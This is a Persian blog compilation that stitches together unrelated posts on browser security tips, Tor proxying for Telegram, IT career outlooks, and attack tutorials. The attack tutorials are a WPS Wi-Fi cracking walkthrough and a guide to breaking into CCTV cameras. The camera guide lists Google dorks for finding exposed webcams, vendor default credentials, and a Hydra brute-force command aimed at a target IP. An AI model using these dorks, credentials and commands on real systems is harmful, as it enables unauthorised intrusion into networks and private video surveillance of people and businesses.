بهبود و تقویت مکانیزم‌های امنیت مرورگر 

حتی بهترین نرم‌افزارهای امنیتی نصب شده نیز ممکن است در زمان آنلاین بودن دچار مشکلات یا به عبارت دقیق‌تر کاستی‌هایی باشند.
McAfee SiteAdvisor قادر است لینک‌هایی را که در نتایج جست‌وجو نشان داده می‌شود، بررسی کرده و از طریق آیکون کوچکی که نشان می‌دهد به شما اعلام دارد که بازدید از یک لینک ایمن بوده یا خطرآفرین است. این محصول حتی می‌تواند با شبکه‌های اجتماعی همچون توییتر و فیس‌بوک نیز به کار گرفته شود. سایت‌هایی که دارای کوتاه‌کننده‌های آدرس‌های اینترنتی هستند و ممکن است لینک‌های حاوی بدافزارها را در خود جای داده باشند. این عملکرد شباهت زیادی به مین‌های جنگی دارد. اگر از فایرفاکس استفاده می‌کنید از افزونه NoScript استفاده کنید. افزونه‌ای که همه کدهای جاوااسکریپت را بلوکه می‌کند، مگر اینکه شما اجازه اجرای آن‌ها را بدهید. این افزونه عملکرد قدرتمندی داشته و می‌تواند یکسری ویژگی‌های موجود در سایت‌ها را نیز غیر فعال کند. اما از شما در برابر حملات آنلاین مبتنی بر جاوااسکریپت محافظت نمی‌کند. در همین حال افزونه HTTPS Everywhere که از سوی Electronic Frontier Foundation ارائه شده قادر است به‌طور خودکار همه ارتباطات شما با اکثر سایت‌ها را رمزگذاری کند. این ویژگی مانع استراق سمع و شنود ارتباطات شما در زمان وبگردی می‌شود. افزونه فوق نمی‌تواند سایت‌هایی را که شما بازدید کرده‌اید، پنهان کند، اما از اطلاعاتی که میان شما، سایت‌ها یا صفحات خاصی مبادله می‌شود محافظت می‌کند. همچنین فراموش نکنید که برای رهایی از دست تبلیغات و ردیابی‌های تبلیغاتی باید از افزونه‌هایی همچون AdBlock Plus و uBlock Origin استفاده کنید. همچنین EFF’s Privacy Badger یک گزینه محبوب برای متوقف کردن فعالیت کوکی‌ها و سایر اشکال نظارت آنلاین است. 

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 3

از فرزندان خود در زمان ورود به فضای مجازی محافظت کنید

مهم نیست، فرزندان شما چطور به فضای آنلاین متصل می‌شوند، همواره این احتمال وجود دارد که آن‌ها با گونه خاصی از محتوا روبرو شوند. خوشبختانه ویندوز با مجموعه‌ای قدرتمند از ابزارهای نظارت والدین در اختیار کاربران قرار دارد. در نتیجه به دانلود نرم‌افزار خاصی نیاز ندارید. (شکل چهار) روی ویندوز 10 منوی شروع را باز کرده و روی تنظیمات کلیک کنید. به مسیر Accounts > Family & other user بروید. توجه داشته باشید که برای بهره‌مندی از این قابلیت باید با حساب کاربری مایکروسافتی خود به ویندوز 10 متصل شده باشید. در کنار این قابلیت گزینه OpenDNS FamilyShield نیز در اختیار شما قرار دارد. FamilyShield یک نرم‌افزار نیست، بلکه سرویسی است که از سوی OpenDNS ارائه شده و به‌طور خودکار سایت‌های نامناسب را مسدود می‌کند. شما می‌توانید این سرویس را به شکل شخصی برای کامپیوترهای خود در خانه تنظیم کرده یا آن‌را روی روتر خود تنظیم کنید. 

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 4

نرم‌افزارهای خود را به‌روز نگه داشته و این فرآیند را خودکارسازی کنید

اغلب طراحان بدافزارها خود ویندوز را هدف قرار نمی‌دهند، به جای آن به سراغ حفره‌های امنیتی نرم‌افزارهایی می‌روند که روی کامپیوترهای شخصی نصب شده‌اند. Adobe Reader از جمله این نرم‌افزارها است. برای کم کردن مخاطرات، شما باید همواره نرم‌افزارهای خود را به‌روز نگه دارید. به‌روز نگه داشتن دستی نرم‌افزارها رویکردی آزاردهنده است. در نتیجه برای صرفه‌جویی در وقت بهتر است این فرآیند را خودکارسازی کنید.
Flexera Personal Software Inspecto ابزار رایگانی است که این‌کار را انجام می‌دهد. این برنامه ضمن آنکه قادر است جدیدترین وصله‌های امنیتی را نصب کند، قادر است کامپیوتر شما را به لحاظ وجود نرم‌افزارهای محبوب قدیمی که غیرایمن هستند مورد اسکن قرار دهد. (شکل پنج)

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 5

لپ‌تاپ خود را قفل کنید

لپ‌تاپ‌ها گم شده یا به سرقت می‌روند. اما راهکارهایی برای کاهش خطر وجود دارد. به‌کارگیری یک قفل قدرتمند از جمله این موارد است. سرویس Prey به شما اجازه می‌دهد لپ‌تاپ خود را قفل کنید تا در صورت به سرقت رفتن از دغدغه‌های شما کاسته شود. این سرویس شامل یک قطعه نرم‌افزاری است که در پس‌زمینه اجرا شده و مکان لپ‌تاپ شما را هر زمان آنلاین شود مشخص می‌کند. (شکل شش)

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 6

ویندوز 10 نیز قابلیت find-my-device را ارائه می‌کند که به شما اجازه می‌دهد مکان لپ‌تاپ گم یا سرقت شده را پیدا کنید. (شکل هفت) رمزگذاری اطلاعات لپ‌تاپ اصل مهمی است که نباید از آن غافل شوید. شما از طریق راهکار ارائه شده از سوی مایکروسافت که بر مبنای وان‌درایو کار می‌کند قادر به رمزگذاری اطلاعات خود هستید. همچنین اگر از ویندوز 10 نسخه حرفه‌ای استفاده می‌کنید قابلیت BitLocker نیز در اختیار شما قرار دارد.

چگونه یک چتر دفاعی قدرتمند برای سامانه‌های کامپیوتری ایجاد کنیم؟
شکل 7

بایوس دستگاه خود را ایمن کنید

این راهکار تنها برای کاربران حرفه‌ای است. بهتر است برای بایوس خود یک گذرواژه قدرتمند قرار دهید. برای این منظور باید به بایوس وارد شده و بر مبنای دستورالعمل ارائه شده از سوی سازنده عمل کنید. سعی‌تان بر این باشد از گذرواژه‌ای استفاده کنید که یادآوری آن ساده باشد.

■■■چگونه ازتلگرام بدون محدودیت استفاده کنیم؟؟■■■

استفاده از تلگرام بدون محدودیت

قبل از شروع آموزش این نکته را یادآور میشویم که تلگرام یک سری پراکسی های رایگان دارد که توسط کاربران ساخته و در دسترس عموم قرار میگیرد که تحت عنوان پروتکل MTProto معروف میباشد که شاید شما دوستان عزیز تا به الان از انها استفاده کرده باشید و با آن ها آشنایی کامل را داشته اید ولی مشکلی که این پراکسی ها دارند این است که باید یک لیست از این پراکسی ها را همیشه داشته باشید تا وقتی یکی قطع میشود از دیگری برای وصل شدن مجدد استفاده کنید مواقعی هم پیش میاد که اصلا هیچ کدام در دسترس نمیباشد . پس برای حل این مشکل ما مجبور بودیم حداقل یک راهی برای وصل شدن به تلگرام را داشته باشیم.

خب حال ما روش بهتری پیشنهاد میکنیم که به نسبت روش های قبلی لااقل هم از سرعت بیشتر و هم از کیفیت مطلوب تری برخوردار است و همیشه هم در دسترس شما دوستان عزیز میباشد.

شما برای این کار باید ابتدا نرم افزار Tor Browser را در سیستم خود نصب کنید حال ممکن است این سوال برایتان پیش بیاد که این نرم افزار چه نرم افزاریه به چه دردی میخوره؟ اگر بخوام جوابی کوتاه و مختصر و مفید به این سوال بدهم; در جواب میگویم که یک مرورگر امن برای وبگردی و دانلود میباشد. حال به چه دردمان میخورد؟ این را هم در جلو خواهید آموخت.

خب برای دانلود این نرم افزار میتونید به این سایتمراجعه کنید و بسته به نوع معماری سیستمون(ویندوز،مک یا لینوکس) یکی رو انتخاب و نصب فرمایید.

ممکن است در ابتدا نیاز به گذر از فیلتر داشته باشید. بعد از دانلود و نصب این مرورگر شما با چنین صفحه ای مواجه خواهید شد:

نسخه ای که تا نگارش این پست موجود است نسخه ۸٫۰٫۳ میباشد.

 

با مواجه شدن شما با این صفحه، یعنی مرورگر به درستی نصب و کانفیگ شده است. در مرحله پایانی کار، ما تلگرام خود را در سیستم باز کرده و اقدام به ست کردن پراکسی مرورگر تور در نرم افزار تلگرام میکنیم.

Setting -> Advanced -> Connection Type

در ادامه Add Proxy را انتخاب کرده و مانند تصویر زیر Hostname و Port را وارد میکنیم:

 

1

Hostname: 127.0.0.1  port: 9150

اگر مرورگر تور در سیستم شما در حال اجرا باشد با چنین چیزی مواجه خواهید شد. این بدان معناست که شما به تلگرام بدون هیچ گونه گذر از تحریمی یا پراکسی دیگری وصل شده اید. از دنیای بدون محدودیت لذت ببرید

آموزش راه اندازی تلگرام بدون محدودیت در اندروید

برای گوشی های اندرویدی روش کار کمی متفاوت است. در ابتدای کار باید برنامه ترموکس را از این لینک دانلود کرده و نصب کنید.

سپس برنامه ترموکس را باز کنید و دستور زیر را برای نصب برنامه تور وارد کنید:

 

1

pkg install tor

سپس دستور زیر را وارد میکنید تا برنامه به حالت اجرا دربیایید.

 

1

tor

حال به تلگرام رفته و در بخش تنظیمات پروکسی، هاست و پورت رو مانند زیر وارد کنید:

 

1

Hostname: 127.0.0.1 port:9050

کار تمام است و حالا میبینید که تلگرام شما با سرعت عالی و بدون قطعی به برنامه تلگرام وصل میشود.

آموزش وابزارهای موردنیاز برای هک وای فای در سیستم عاملwindows

سلام و عرض ادب خدمت کاربران محترم کالی بویز. امروز در مورد بحث بسیار جذابی با عنوان “هک وای فای در سیستم عامل ویندوز” در خدمت شما خواهیم بود. خب مسلما باید حدس زده باشید که چه نوع شبکه های وایرلسی در سیستم عامل ویندوز قابل نفوذ هستند. بله درسته، وایرلس هایی که از قابلیت wps استفاده می کنند.

WPS چیست؟

Wps یک مکانیزمی است که برای اتصال ساده کلاینت های بیسیم به access point از طریق یک کد ۸ رقمی کاربرد دارد. برخی از دستگاه های بیسیم قابلیت وارد کردن Passphrase را ندارند و فقط با wps کار می کنند. همچنین این قابلیت حدودا بر روی ۷۰ درصد از اکسس پوینت های موجود در بازار به شکل پیشفرض فعال است.از جمله این APها میتوان به موارد زیر اشاره کرد:

  • TP-Link
  • D-Link
  • Zyxel
  • حتی روترهای Cisco

این مکانیزم به دو شکل اتصال را فراهم می کند:

  1. به وسیله یک PINکد که زیر AP نوشته شده و یا داخل دفترچه راهنما Device بیسیم قرار دارد و همچنین داخل نرم افزار AP هم قابل دسترس می باشد.
  2. به وسیله یک کلید که معمولا پشت اکسس پویت قرار دارد و با دکمه WPS شناخته می شود. بر روی یک Device بیسیم با زدن این کلید(بسته به نوع AP) حدود ۲ دقیقه زمان است تا کلاینت هم کلید WPS را بر روی Device خود فعال کند و به AP متصل شود.

توصیه ما به شما این است که اگر از Device های بیسیم استفاده می کنید، حتما قابلیت WPS رو غیر فعال کنید. چون حتی اگر یک پسورد ترکیبی بسیار قوی با طول رشته بسیار بالا هم داشته باشید به وسیله آسیب پذیری های موجود در WPS به راحتی هک خواهید شد.

آموزش تست نفوذ مودم هایی که از wps استفاده می کنند

برای هک wps در ویندوز از دو برنامه  dumper و jumpstart اسفاده می کنیم که به صورت مکمل هم کار می کنند.

ابتدا نرم افزار جامپ استارت را بر روی سیستم خود نصب می کنیم. سپس نرم افزار دامپر را اجرا می کنیم که محیط نرم افزار به شکل زیر است:

سپس در نرم افزار دامپر بر روی گزینه wps کلیک می کنیم و تیک گزینه ها رو مثل تصویر زیر قرار میدیم. در قسمت بعدی نیز آدرس پوشه جامپ استارت را که نصب کردیم، انتخاب میکنیم.

پس از انجام مراحل بالا، وای فای مورد نظر خود را طبق تصویر زیر انتخاب می کنیم تا اطلاعات آن نشان داده شود. سپس بر روی گزینه ای که با علامت سبز رنگ مشخص شده کلیک می کنیم.

ادامه کار توسط برنامه انجام می شود و تقریبا در عرض ۳۰ ثانیه به مودم تارگت متصل خواهیم شد.

■■برترین وبهترین وپردآمدترین شغلهای حوزه کامپیوتر در آینده نزدیک■■

طبق پیش‌بینی‌های صورت گرفته این 10 شغل حوزه کامپیوتر و فناوری اطلاعات سریعترین رشد را خواهند داشت، حقوق و دستمزد بالایی دارند و میزان اشتغال‌زایی آن‌ها بالاست و می‌توانند فرصت‌های مناسبی را جهت ارتقاء و پیشرفت فراهم نمایند.

روش یافتن بهترین شغل‌ها در حوزه کامپیوتر در دهه جاری، بر اساس تجزیه و تحلیل‌های چهارجانبه شامل پیش‌بینی‌‌ها در رشد اشتغال از اداره آمار کار ایالات متحده، حقوق و دستمزد فناوری اطلاعات از Inded.com، نسبت لیست مشاغل به متقاضیان واجد شرایط در سایت‌های کاریابی و پتانسیل حرکت رو به بالا بر اساس مصاحبه‌ با کارشناسان استخدام و فناوری و همچنین روندهای استخدامی اخیر در IT   صورت گرفته است.

با 10 شغل برتر حوزه کامپیوتر و IT در آینده آشنا شوید:

1-توسعه‌دهنده اپلیکیشن موبایل

پیش‌بینی‌های اشتغال توسعه دهنده اپلیکیشن موبایل ( 2016 تا 2026)

رشد 10 ساله: 31 درصد ( بسیار سریعتر از حد میانگین)

دوره رشد 10 ساله: 255400 شغل جدید

 توسعه اپلیکیشن موبایل از جمله مشاغلی است که سریعترین رشد را در جهان تجربه می‌کند. از آنجایی که تبلت‌ها و گوشی‌های هوشمند دائم در حال تغییر شیوه‌های ارتباطی ما، انجام کسب و کار و دسترسی به اخبار و سرگرمی‌ها هستند، تقاضا برای اپ‌های جدید و نوآوانه تلفن همراه به شکل باورنکردنی رو به افزایش است و این تقاضای روزافزون به یکی از بزرگترین خلاء‌ها در مهارت‌های IT تبدیل شده و نیازمند توسعه‌دهندگان ماهری است که بتوانند این جای خالی را پر کنند. از این رو فرصت‌‌های شغلی زیادی در این زمینه وجود دارد. پلتفرم‌های ( آیپد و آیفون) سیستم عامل اپل و اندروید همچنان بیشترین فرصت‌های شغلی را برای توسعه دهندگان موبایل فراهم می‌سازند.

2- مهندس نرم افزار

پیش‌بینی‌ اشتغال مهندس نرم افزار (2016 تا 2026(

درصد رشد 10 ساله: 24 درصد ( بسیار سریعتر از حد میانگین)

حجم رشد 10 ساله: 302500 شغل جدید

تقاضای نیروی کار برای مهندسین نرم افزار همراه با پیشرفت فناوری و رشد همه جانبه نرم‌افزار افزایش خواهد داشت. برای مثال، استقبال سریع از فناوری‌های ابری موجب افزایش تقاضا برای مهندسین نرم افزار در حوزه برنامه‌ها کاربردی شده، کسانی که بتوانند برنامه‌های ابری مقیاس پذیر و امن بسازند.  همچنین با ادامه گسترش سیستم‌های کامپیوتری و نرم افزار در صنایع جدید و دستگاه‌های هوشمند، نیاز به توسعه سیستم‌های کامپیوتری که بتوانند این نوآوری‌ها را توانمند کنند، فرصت‌های شغلی مناسبی را برای مهندسین نرم افزار سیستم ایجاد می‌کند.

3- طراح بازی‌های ویدیویی

پیش‌بینی‌ اشتغال طراح بازی‌های ویدیویی (2016 تا 2026)

درصد رشد 10 ساله: 30 درصد ( بسیار سریعتر از حد میانگین)

حجم رشد 10 ساله: 270900 شغل جدید

درآمد 100 میلیارد دلاری صنعت بازی در دهه گذشته بیش از سه برابر بوده است. فراتر از بازار پررونق بازی‌های کامپیوتری و کنسول‌ها، افزایش محبوبیت، پردازش قدرت و قابلیت‌های گرافیکی دستگاه‌های تلفن همراه ، دنیای جدیدی از فرصت‌ها را در برابر طراحان بازی‌های ویدیویی، هنرمندان و برنامه‌نویسان گشوده است. بخصوص نیاز به طراحان بازی‌ها با تخصص توسعه تلفن همراه رو به افزایش است چرا که نحوه نمایش و اجرای بازی‌های ویدیویی دائم در گوشی‌های هوشمند و تبلت‌ها در حال تغییر است. ظهور فناوری‌ها و افزایش تقاضا برای اپلیکیشن‌های واقعیت افزوده (AR) و واقعیت مجازی (VR) نیز به نفع طراحان بازی‌ها می‌باشد.

4- متخصص امنیت فناوری اطلاعات

پیش‌بینی‌ اشتغال متخصص امنیت IT  ( 2016 تا 2026)

درصد رشد 10 ساله : 28 درصد ( بسیار سریعتر از حد میانگین)

حجم رشد 10 ساله: 28500

امنیت یکی از نگرانی‌های اصلی مدیران فناوری اطلاعات است و استخدام مدیران کارکشته در این زمینه به دلیل وفور، دامنه و پیچیدگی حملات سایبری همچنان رو به افزایش است. سال‌هاست که مدیران IT عنوان می‌کنند که به دنبال افراد حرفه‌ای و با مهارت‌ در حوزه امنیت اطلاعات هستند، اما یافتن این افراد به اندازه ی جستجوی یک استعداد خوب دشوار است. این نشاندهنده یک فرصت عالی برای متخصصان فناوری است تا مهارت‌ها و گواهینامه‌های امنیتی سایبری خود را ارتقاء دهند. مهارت‌های امنیتی کامپیوتر که متقاضیان زیادی دارند شامل: امنیت عملیات IT، امنیت دستگاه موبایل، مدیریت خطر، امنیت اطلاعات، امنیت شبکه و امنیت مجازی سازی/ ابر می‌باشند.

5- تحلیلگر سیستم‌های کامپیوتر

پیش‌بینی‌ اشتغال تحلیلگر سیستم‌های کامپیوتر (2016-2026)

درصد رشد 10 ساله: 9 درصد (به اندازه میانگین)

حجم رشد 10 ساله: 54400 شغل جدید

از آنجایی که سازمان‌ها اطمینان خود را به فناوری افزایش می‌دهند، برای معماری سیستم‌های جدید نیاز به استخدام تحلیلگران سیستم‌های کامپیوتر دارند. مراقبت‌های بهداشتی، یک صنعت مهم و کلیدی برای رشد شغلی تحلیگران سیستم است، چرا که  ابتکارات مالی در انجام کارهایی چون ثبت الکترونیکی اطلاعات پزشکی (EMR)، خدمات نسخه الکترونیکی و دیگر پروژه‌های نرم افزاری بهداشتی- محور که مستلزم سیستم‌های کامپیوتری سفارشی هستند، رو به افزایش است. وزارت کار ایالات متحده یک رشد 43 درصدی را در استخدام تحلیگران سیستم در شرکت‌های مشاوره IT تخمین زده که به فرصت‌های شغلی  قراردادی و آزادکار زیادی در این موقعیت تبدیل می‌شود.

6- توسعه دهنده وب

پیش‌بینی‌ اشتغال توسعه دهنده وب (2016 تا 2026)

درصد رشد 10 ساله: 15 درصد ( بسیار سریعتر از حد میانگین)

حجم رشد 10 ساله: 24400 شغل‌های جدید

هر ساله، تعداد قابل توجهی از کسب و کارها محصولات خود را به اینترنت می‌آورند. با افزایش خدمات و محصولات آنلاین، توسعه دهندگان و طراحان وب از فرصت‌های شغلی بیشتر برخوردار خواهند شد. ترویج شبکه‌های اجتماعی، تقاضا برای توسعه دهندگان وب را تقویت می‌کند، چراکه کسب و کارها به دنبال جذب نسل جدید مشتریان و تحریک جو رقابتی در این فضای رو به رشد هستند. وجود مهارت‌هایی همچون طراحی وب واکنش گرا، رابط کاربر (UI) و تجربه کاربری (UX) یک ویژگی فوق‌العاده در این موقعیت است، چون نمایشگرها باید تا حد زیادی با انواع دستگاه‌ها در اندازه‌های مختلف همچون ساعت‌های هوشمند سازگار باشند.

7- تکنسین اطلاعات بهداشت

پیش‌بینی اشتغال تکنسین اطلاعات بهداشت (2016-2026)

درصد رشد 10 ساله: 13 درصد ( سریعتر از حد میانگین)

مراقبت‌های بهداشتی در سال 2020، مشاغل جدیدی را در حوزه کامپیوتر نسبت به هر صنعت دیگری ایجاد خواهد کرد. انگیزه‌ سرمایه‌گذاری در اقدامات ‌پزشکی که در جهت تصویب ایجاد پرونده‌های الکترونیکی سلامت متمرکز صورت می‌گیرند، منجر به استخدام بی‌سابقه تکنسین‌های اطلاعات بهداشت آموزش دیده در این فناوری‌های جدید می‌شود. شاید این شغل در ابتدا درآمد چندانی نداشته باشد ولی با رشد بازار مشاغل مربوط به فناوری‌های بهداشتی، به مراتب درآمد هم افزایش خواهد یافت.

8- مدیر فناوری

پیش‌بینی اشتغال مدیر فناوری (2016-2026)

درصد رشد 10 ساله: 12 درصد ( سریعتر از حد میانگین)

حجم رشد 10 ساله: 44200 شغل جدید

رشد شغلی مدیران فناوری اطلاعات مستقیماً به نرخ رشد کارمندان IT بستگی دارد که این مدیران بر آن‌ها نظارت دارند. رشد رکورد شکن در مشاغل فنی از جمله شبکه سازی، توسعه موبایل، مهندسی نرم افزار، مدیریت داده، و محاسبه ابری- تا سال 2025 و فراتر از آن ادامه خواهد داشت، و این یعنی تقاضا بیشتر برای مدیران IT بااستعداد. این رشد تقاضا با وجود تمرکز بیشتربر روی امنیت اطلاعات، افزایش خواهد یافت؛ در نتیجه استخدام کارکنان حوزه امنیت سایبری نیز افزایش می‌یابد.

9- مدیر پایگاه داده‌

پیش‌بینی اشتغال مدیر پایگاه داده (2016 تا 2026)

درصد رشد 10 ساله: 11 درصد ( سریعتر از حد میانگین)

حجم رشد 10 ساله: 13700 شغل جدید

کسب و کارها مقدار قابل ملاحظه‌ای اطلاعات دیجیتالی دریافت می‌کنند و همین امر نیاز به مدیران آموزش دیده  با مدرک پایگاه داده را جهت ذخیره، سازماندهی، تجزیه و تحلیل و حفاظت این داده‌ها افزایش می‌دهد. بعلاوه، از آنجایی که پایگاه‌های داده زیادی به اینترنت و ابر وصل می‌شوند، امنیت داده‌ها  به یک فرایند بسیار پیچیده و حیاتی تبدیل شده است؛ مدیران پایگاه داده و توسعه دهندگان بخصوص کسانی که دارای مهارت‌های امنیت اطلاعات هستند، جهت محافظت از داده‌ها در مقابل هکرها و دیگر تهدیدات سایبری استخدام می‌شوند.

10- مدیر شبکه

 پیش‌بینی اشتغال مدیر شبکه (2016 تا 2026(

درصد رشد 10 ساله: 6 درصد ( به اندازه میانگین)

حجم رشد 10 ساله: 24000 شغل جدید

با توجه به این که سازمان‌ها برای افزایش بهره‌وری و به دست آوردن امتیازات رقابتی روی سیستم‌های کامپیوتری جدید و فناوری‌های شبکه سرمایه‌گذاری می‌کنند، نیاز به مدیران شبکه هم افزایش می‌یابد. استقبال از تبلت‌ها و گوشی‌های هوشمند در فرهنگ سازمانی به معنی استفاده از اینترنت جهت انجام کسب و کارهای آنلاین و افزایش فرصت‌های شغلی برای مدیران شبکه و مجریان شبکه می‌باشد، کسانی که می‌توانند با استفاده از این فناوری‌های نوظهور به شکلی ایمن به کسب و کارها کمک کنند. داشتن مهارت‌ در محاسبات ابری نیز تاثیر بسزایی در چشم انداز شغل مدیریت شبکه دارد.

((روشهای هک ونفوذ به دوربینهای مداربسته))

امروزه دوربین مداربسته به یک سیستم امنیتی مهم تبدیل شده است که در اکثر مکان ها مانند مغازه ها، مراکز، دفاتر، انبار و غیره استفاده می شود.در این آموزش با روش های نفوذ به دوربین های مداربسته آشنا خواهید شد.

اگر بخواهیم روش های نفوذ به دوربین های مداربسته را به ترتیب بیان کنیم، یک لیست به صورت زیر خواهیم داشت:

  1. دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)
  2. پیدا کردن پسورد
  3. دسترسی فیزیکی
  4. هک وبسایت سرویس دهنده
  5. هک دستگاه DVR/NVR

دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)

در روش اول ما از طریق چند روش میتوانیم دوربین های مورد نظر خود را پیدا کنیم. به عنوان مثال : استفاده ازموتور جستجوی شودان یا استفاده از گوگل و…

به منظور شروع جستجو در وب سایت شودان ابتدا به آدرس shodan.io رفته و به حساب کاربری خود درشودان لاگین کنید.

راه های زیادی به منظور جستجوی دوربین ها درون شودان وجود دارد. به عنوان نمونه جستجو بر اساس نام سازنده وبکم شروع خوبی است. به یاد داشته باشید که شودان اطلاعات بنر سازنده ها را ذخیره می کند و جستجو را بر این اساس انجام می دهد نه محتوای آنها. یکی از سازنده های معروف که نتایج خوبی را به همراه دارد، webcamxp می باشد که صدها نتیجه را به همراه خواهد داشت. به این منظور کلمه کلیدی webcamxp را درون نوار جستجو وارد کنید. همانطور که مشاهده می کنید نتایج زیادی را به همراه دارد.

تمام این وبکم ها به دلیل عدم وجود احرازهویت توسط شما قابل مشاهده هستند. و ما میتوانیم با باز کردن ایپی ادرس انها در مرورگر خود، بدون نیاز به احراز هویت دوربین ها را تماشا کنیم.

هک دوربین ها مدار بسته با شودان

همچنین میتوانیم از گوگل برای پیدا کردن این گونه دوربین ها استفاده کنیم که در این حالت نیاز به دورک های خاص داریم. به عنوان مثال من چند مورد از این دورک ها رو برای شما میزارم:

 

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

    inurl:”CgiStart?page=”

    inurl:/view.shtml

    intitle:”Live View / – AXIS

    inurl:view/view.shtml

    inurl:ViewerFrame?Mode=

    inurl:ViewerFrame?Mode=Refresh

    inurl:axis-cgi/jpg

    inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)

    inurl:view/indexFrame.shtml

    inurl:view/index.shtml

    inurl:view/view.shtml

    liveapplet

    intitle:”live view” intitle:axis

    intitle:liveapplet

    allintitle:”Network Camera NetworkCamera” (disconnected)

    intitle:axis intitle:”video server”

    intitle:liveapplet inurl:LvAppl

    intitle:”EvoCam” inurl:”webcam.html”

    intitle:”Live NetSnap Cam-Server feed”

    intitle:”Live View / – AXIS”

    intitle:”Live View / – AXIS 206M”

    intitle:”Live View / – AXIS 206W”

    intitle:”Live View / – AXIS 210?

    inurl:indexFrame.shtml Axis

    inurl:”MultiCameraFrame?Mode=Motion” (disconnected)

    intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”

    intitle:snc-z20 inurl:home/

    intitle:snc-cs3 inurl:home/

    intitle:snc-rz30 inurl:home/

    intitle:”sony network camera snc-p1?

    intitle:”sony network camera snc-m1?

    site:.viewnetcam.com -www.viewnetcam.com

    intitle:”Toshiba Network Camera” user login

    intitle:”netcam live image” (disconnected)

    intitle:”i-Catcher Console – Web Monitor”

روش پیدا کردن پسورد(Find password)

یکی از رایج ترین روش های نفوذ به دوربین های مدار بسته، روش پیدا کردن پسورد است. تمامی دوربین های مداربسته به یک دستگاه DVR/NVR که وظیفه کنترل و مدیریت دوربین ها را دارد متصل میشوند و این دستگاه نیز از طریق کابل شبکه به اینترنت متصل میشود. دستگاه DVR/NVR بعد از متصل شدن به اینترنت یک ایپی استاتیک دریافت میکند که یک هکر با داشتن آن ip و یوزرنیم و پسورد متعلق به آن، میتواند در هر جای دنیا که باشد از طریق اینترنت به دوربین ها دسترسی پیدا کند.

حال ۲ سناریو به وجود می آید:

  1. روش های پیدا کردن ip دوربین ها
  2. داشتن ایپی دوربین ها و نداشتن پسورد انها

برای سناریو اول نیز میتوانیم از چند روش استفاده بکنیم که بهترین آنها استفاده از موتورهای جستجو یا اسکن رنج ایپی های متفاوت است.

در روش موتورهای جستجو، همانند روشی عمل میکنیم که در دوربین های پیکربندی نشده به ان اشاره کردیم.

در روش اسکن رنج ایپی های متفاوت نیز میتوانیم به صورت زیر عمل کنیم:

  1.  نصب برنامه Angry Ip Scanner
  2. انتخاب رنج ایپی مناسب
  3. کانفیگ پورت برنامه انگری ایپی اسکنر به پورت های مورد استفاده در دوربین ها

بعد از دانلود و نصب برنامه به سراغ انتخاب رنج ایپی مناسب برای دوربین های مدار بسته میرویم که من پیشنهاد میکنم از رنج ایپی خود برای این کار استفاده کنید. برای این کار کافی است تا عبارت “my ip” را در گوگل سرچ کنید.

در مرحله بعد پورت های مهم را در برنامه تنظیم میکنیم:

همچنین در قسمت Fetchers نیز گزینه web detect را مانند تصویر زیر انتخاب میکنیم:

حالا کافی است تا رنج خود را در برنامه تنظیم کرده و اسکن را شروع کنیم:

بعد از باز کردن ایپی مورد نظر در مرورگر خود به صفحه لاگین دوربین میرسیم که مهم ترین قسمت کار به شمار میرود. و سناریو دوم ما به حساب می اید:برای پیدا کردن پسورد چندین راه وجود دارد که مهم ترین انها میتواند: شکستن پسود یا استفاده از پسورد های پیشفرض باشد.

اولین گام به منظور عبور از این سیستم ها امتحان کردن نام کاربری و رمزعبورهای پیش فرض موجود این وبکم ها می باشد . برخی از اعتبارنامه های پیش فرض این وبکم ها به شرح زیر می باشد:

 

1

2

3

4

5

6

7

8

9

10

11

12

13

ACTi : admin/123456 , Admin/123456

Axis (Old) : root/pass

Grandstream: admin/admin

IQinVision: root/system

Mobotix: admin/meinsm

Panasonic: admin/12345

Samsung Electronics: root/root , admin/4321

Samsung Techwin :admin/4321 , admin/1111111

Sony: admin/admin

TRENDnet: admin/admin

Toshiba: root/ikwd

Vivotek : root,empty

WebcamXP: admin/empty

در روش شکستن پسورد هم میتوانیم از ابزارهای موجود برای کرک کردن استفاده کنیم که یکی از این ابزارها، Hydra میباشد. این ابزار به صورت پیشفرض در سیستم عامل کالی لینوکس موجود میباشد که با استفاده از دستور زیر در محیط ترمینال میتوانیم از ان استفاده کنیم:

 

1

root@kaliboys:~# hydra -s 80 -l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http

آرگومان های استفاده شده در این دستور:

  • -s 80 شناسایی پورت
  • -l admin یوزرنیم پیشفرض استفاده شده
  • -P /root/desktop/worldlist.txt انتخاب پسورد لیست مناسب
  • -e پسورد خالی
  • ns تلاش برای لاگین کردن با پسورد خالی
  • http پورت لازم برای اتک

۳ روش باقیمانده دیگر نیز براساس نام انها قابل درک است و نیازی به توضیح ندارند. ولی میتوان گفت که سخت ترین روش ها میباشند. چون برای مثال یک شرکت سازنده دستگاه dvr، هیچ موقع باگی برای نفوذ باقی نمیگذارد تا با استفاده از ان نفوذگر بتواند به سیستم عبور کند. ولی امنیت هیچ موقع ۱۰۰ درصد نبوده و نخواهد بود پس احتما هک شدن سیستم با این روش نیز امکان دارد.

جلوگیری ازهک وامنیت درسازمان ها

محافظت ازچیزی که در مورد آن اطلاع نداریم برای ما سخت خواهد بود. برای جلوگیری از هک شدن، شما باید یک نمای کامل از هر سرور و دستگاه های در معرض اینترنت داشته باشید. با Censys، شما می توانید زیرساخت های شناخته شده شرکت را نظارت کنید.

برای به دست آوردن دید جامع از دارایی های یک سازمان، به اطلاعاتی مانند زمان واقعی در مورد هر سرور، میزبان و دامنه متصل به اینترنت نیاز دارید. با استفاده از این اطلاعات، می توانید زیرساخت های ناشناخته را کشف کنید، دارایی های شناخته شده را مشاهده کرده و آسیب پذیری ها را پیدا کنید تا بتوانید آنها را رفع کنید.

 

